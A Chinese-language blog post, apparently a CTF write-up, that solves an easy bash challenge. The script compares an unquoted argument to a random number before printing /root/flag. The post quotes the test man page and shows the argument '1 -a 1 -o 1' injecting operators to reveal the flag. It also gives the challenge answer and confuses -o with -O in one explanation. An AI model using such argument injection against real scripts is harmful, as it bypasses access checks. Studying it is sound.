Post

有意思的一个shell脚本复盘

难度-Easy

Posted Updated
By
6 min read
有意思的一个shell脚本复盘

源代码

1
2
3
4
5
6
7
8

#!/bin/bash

PATH=/usr/bin
CHALLENGE=$RANDOM$RANDOM$RANDOM

[ -n "$1" ] || exit 1
[ $1 -eq "$CHALLENGE" ] && cat /root/flag
echo "Goodbye!"

代码解析

这个脚本主要表达的是先设计环境为/usr/bin接着进行三个随机数拼接,接下来进行条件判断,当你条件为空(不是数字)直接退出脚本,是数字的话进行比较判断随机数相等的情况输出flag

解决方案

首先我是没成功的但是我去看wp,这里我了解了2个知识点一个是bash -x可以对你的脚本进行调试,这样你可以看到你的脚本运行情况,第二个知识点是[]和test都是条件测试,所以我们可以去看test获得对应的操作提示

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118

       ( EXPRESSION )
              EXPRESSION is true

       ! EXPRESSION
              EXPRESSION is false

       EXPRESSION1 -a EXPRESSION2
              both EXPRESSION1 and EXPRESSION2 are true

       EXPRESSION1 -o EXPRESSION2
              either EXPRESSION1 or EXPRESSION2 is true

       -n STRING
              the length of STRING is nonzero

       STRING equivalent to -n STRING

       -z STRING
              the length of STRING is zero

       STRING1 = STRING2
              the strings are equal

       STRING1 != STRING2
              the strings are not equal

       INTEGER1 -eq INTEGER2
              INTEGER1 is equal to INTEGER2

       INTEGER1 -ge INTEGER2
              INTEGER1 is greater than or equal to INTEGER2

       INTEGER1 -gt INTEGER2
              INTEGER1 is greater than INTEGER2

       INTEGER1 -le INTEGER2
              INTEGER1 is less than or equal to INTEGER2

       INTEGER1 -lt INTEGER2
              INTEGER1 is less than INTEGER2
       INTEGER1 -ne INTEGER2
              INTEGER1 is not equal to INTEGER2

       FILE1 -ef FILE2
              FILE1 and FILE2 have the same device and inode numbers

       FILE1 -nt FILE2
              FILE1 is newer (modification date) than FILE2

       FILE1 -ot FILE2
              FILE1 is older than FILE2

       -b FILE
              FILE exists and is block special

       -c FILE
              FILE exists and is character special

       -d FILE
              FILE exists and is a directory

       -e FILE
              FILE exists

       -f FILE
              FILE exists and is a regular file

       -g FILE
              FILE exists and is set-group-ID

       -G FILE
              FILE exists and is owned by the effective group ID

       -h FILE
              FILE exists and is a symbolic link (same as -L)

       -k FILE
              FILE exists and has its sticky bit set

       -L FILE
              FILE exists and is a symbolic link (same as -h)
       -N FILE
              FILE exists and has been modified since it was last read

       -O FILE
              FILE exists and is owned by the effective user ID

       -p FILE
              FILE exists and is a named pipe

       -r FILE
              FILE exists and the user has read access

       -s FILE
              FILE exists and has a size greater than zero

       -S FILE
              FILE exists and is a socket

       -t FD  file descriptor FD is opened on a terminal

       -u FILE
              FILE exists and its set-user-ID bit is set

       -w FILE
              FILE exists and the user has write access

       -x FILE
              FILE exists and the user has execute (or search) access

       Except for -h and -L, all FILE-related tests dereference symbolic links.  Beware that parentheses need to be escaped (e.g., by backslashes) for shells.  INTEGER may also be -l STRING, which evaluates to the length of STRING.

       NOTE: Binary -a and -o are inherently ambiguous.  Use 'test EXPR1 && test EXPR2' or 'test EXPR1 || test EXPR2' instead.

       NOTE: [ honors the --help and --version options, but test does not.  test treats each of those as it treats any other nonempty STRING.

       NOTE: your shell may have its own version of test and/or [, which usually supersedes the version described here.  Please refer to your shell's documentation for details about the options it supports.

这里用到的条件是-a和-o,-a呢是均为真时,-o呢是文件存在且uid相同

1
2
3
4
5
6
7

root@LingMj:/home/lingmj/xxoo# bash -x ./rand.sh '1'
+ PATH=/usr/bin
+ CHALLENGE=102993051618196
+ '[' -n 1 ']'
+ '[' 1 -eq 102993051618196 ']'
+ echo 'Goodbye!'
Goodbye!

这里看到我们输入1后进行的比较

1
2
3
4
5
6
7

root@LingMj:/home/lingmj/xxoo# bash -x ./rand.sh '1 -a 1'
+ PATH=/usr/bin
+ CHALLENGE=1057301544146
+ '[' -n '1 -a 1' ']'
+ '[' 1 -a 1 -eq 1057301544146 ']'
+ echo 'Goodbye!'
Goodbye!

因为没有引号的缘故我们输入到$1的值会全部输入进去进行判断,这里最后就是用到sql注入的思想把它后面的值给判断掉一样,-o 是逻辑或操作符,只要前面的条件为真,整个表达式就为真。

1
2
3
4
5
6
7
8
9

root@LingMj:/home/lingmj/xxoo# bash -x ./rand.sh '1 -a 1 -o 1'
+ PATH=/usr/bin
+ CHALLENGE=262342765225395
+ '[' -n '1 -a 1 -o 1' ']'
+ '[' 1 -a 1 -o 1 -eq 262342765225395 ']'
+ cat /root/flag
hmv{hhhhhh}
+ echo 'Goodbye!'
Goodbye!

我们现在用户为0,而且文件存在且uid为0,这个时候会把文件给输出出来,整体体验下来这个脚本是很有意思,感谢群主的题目提供!!

HomemadeDrone
shell
This post is licensed under CC BY 4.0 by the author.